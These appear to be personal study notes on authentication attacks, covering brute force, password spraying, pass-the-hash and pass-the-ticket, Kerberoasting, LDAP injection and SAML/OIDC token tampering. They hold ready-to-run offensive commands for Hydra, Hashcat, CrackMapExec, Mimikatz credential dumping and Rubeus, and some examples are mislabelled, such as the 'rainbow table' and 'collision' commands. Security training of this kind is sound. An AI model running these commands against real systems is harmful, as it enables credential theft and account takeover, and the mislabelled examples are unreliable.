Notes

Sec18 - Authentication Attacks

4 min read

Core Lessons & Techniques

1. Password Attacks

Brute-Force

  • Definition: Try every combination until the correct one is found
  • Tool: Hydra
  • Command Example: 
    hydra -l jkelly -x 4:8:abcdefghijklmnopqrstuvwxyz1234567890 \
      ssh://192.168.1.100
- `-l jkelly` = username
- `-x 4:8:…` = password length 4–8, allowed chars

#### Dictionary
- **Definition:** Use wordlists of common passwords
- **Tool:** John the Ripper
- **Command Example:**
    ```bash
    john --wordlist=/usr/share/wordlists/rockyou.txt \
         --rules --format=raw-md5 hash_file.txt
    ```

#### Hybrid
- **Definition:** Dictionary + brute-force mutations
- **Command Example:**
    ```bash
    john --wordlist=/usr/share/wordlists/rockyou.txt \
         --rules --format=raw-md5 samplehashfile.txt
    ```

#### Rainbow-Table

- **Definition:** Precomputed hash→plaintext lookup
- **Tool:** Hashcat
- **Command Example:**
    ```bash
    hashcat -m 0 -a 0 -o cracked.txt hashes.txt \
             /usr/share/rainbow-tables/rockyou.hctab
    ```

---

### 2. Credential Attacks

#### Password Spraying

- **Definition:** Try one common password against many accounts
- **Tool:** CrackMapExec
- **Command Example:**
    ```bash
    crackmapexec smb 192.168.1.0/24 \
      -u users.txt -p 'Summer2024!'
    ```

#### Password Masking
- **Definition:** Mask-based attack fitting known password patterns
- **Tool:** Hashcat
- **Command Example:**
    ```bash
    hashcat -a 3 -m 0 hashfile.txt \
      '?u?l?l?l?l?d?d?s'
    ```

#### Credential Stuffing

- **Definition:** Replay breached username/password pairs
- **Tool:** Hydra
- **Command Example:**
    ```bash
    hydra -L usernames.txt -P passwords.txt \
          http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect"
    ```

#### MFA Fatigue

- **Definition:** Flood user with MFA prompts until they approve
- **Prevention:**
    - Use push-binding MFA (only one prompt per login)
    - Train users to deny unexpected prompts

---

### 3. Credential-Passing Attacks

#### Pass-the-Hash
- **Definition:** Use NTLM hash in place of password
- **Tool:** Mimikatz + CrackMapExec
- **Commands:**
    ```powershell
    # Extract hashes
    mimikatz # sekurlsa::logonpasswords
    # Use hash to authenticate
    crackmapexec smb 10.0.0.5 -u '' -H aad3b435b51404eeaad3b435b51404ee
    ```

#### Pass-the-Ticket
- **Definition:** Reuse Kerberos TGTs/TGSs for SSO
- **Tools:** Mimikatz + Impacket
- **Commands:**
    ```powershell
    # Export tickets
    mimikatz # kerberos::list /export
    # Impacket psexec with ticket
    psexec.py -k -no-pass DOMAIN/user@10.0.0.5
    ```

#### Pass-the-Token
- **Definition:** Steal and reuse JWT/OAuth tokens
- **Usage:**
````http
    GET /api/data HTTP/1.1
    Host: example.com
    Authorization: Bearer <stolen_JWT_token>

4. Directory Service Attacks

Kerberos

  • Kerberoasting: Crack service account hashes offline
  • Tool: Rubeus or Mimikatz + Hashcat
  • Command Example (Rubeus): 
    Rubeus kerberoast /outfile:kerberoast_hashes.txt
  • Prevention: Strong service‐account passwords, AS‐REP hardening

LDAP Injection

  • Definition: Inject malicious filter into LDAP queries
  • Example: 
    (&(uid=*)(!(uid=*)(|(uid=*)(pthread*))))
  • Prevention: Input validation, parameterized LDAP calls

5. Automated Attack Frameworks

CrackMapExec (CME)

  • Functions: SMB auth, hash/ ticket relay, command exec
  • Example Commands: 
    # Validate creds across network
cme smb 192.168.1.0/24 -u users.txt -p passwords.txt
 
# Execute ipconfig remotely
cme smb 10.0.0.5 -u 'admin' -p 'P@ssw0rd' -x 'ipconfig'

CrackMapExec is not actively maintained anymore so highly suggested to use Rubeus instead in the future

SAML Attacks

  • Application to enable single sign on aka SSO’s
  • Token Manipulation: Modify <Attribute> in SAML assertion
    • Tool: SAML Raider (Burp extension)
  • SAML Replay Attack: Intercept SAML response and reuse for access.
  • SAML Injection Attacks: Exploit vulns in app that process SAML tokens.
    1. Edit <saml:Attribute Name="Role">user</…>admin
    2. Re-sign and forward
  • Prevention:
    • Always validate and sanitize user inputs & SAML tokens
    • Use parameterized queries
    • Enforce strict XML schema validation
    • Ensure token’s short lifetimes & reject accepted tokens

OpenID Connect (OIDC) Attacks

  • Based on OAuth 2.0 protocol to verify the identify of end users & (SSO)

  • ID Token Maniplulation: Flip "admin":false"admin":true

  • Tool: Burp + custom JWT editor

  • Prevention:

    • Verify token signature with OP’s public key
    • Check nonce, aud and exp claims

  • ID Token Replay Attack: Captures token to reuse the token for access

  • ID Token injection: Exploit vulns in app that process the tokens itself

  • WebFinger Service: Gather information about users or resources

    • Common endpoints: .well-known/webfinger
    • Prevention: restrict access to these endpoints & monitor queries

  • SSRF via Dynamic Client Registration: basically conduct an SSRF by manipulating registration requests to cause the server to give out data.

6. Hash-Based Attacks

Collision (Birthday) Attacks

  • Definition: Find two inputs with same hash
  • Tool: Hashcat
  • Example: 
    hashcat -m 0 -a 3 -o collisions.txt hash.txt '?a?a?a?a?a'

Strengthening Hash Storage

  • Salting: Unique per-user random salt → 
    salted = salt + password
hash = PBKDF2(salted, iterations=100_000)
  • Key Stretching: Used to enhance hash security and time to compute it
    • Examples: PBKDF2 / bcrypt / scrypt for CPU hardness

Graph View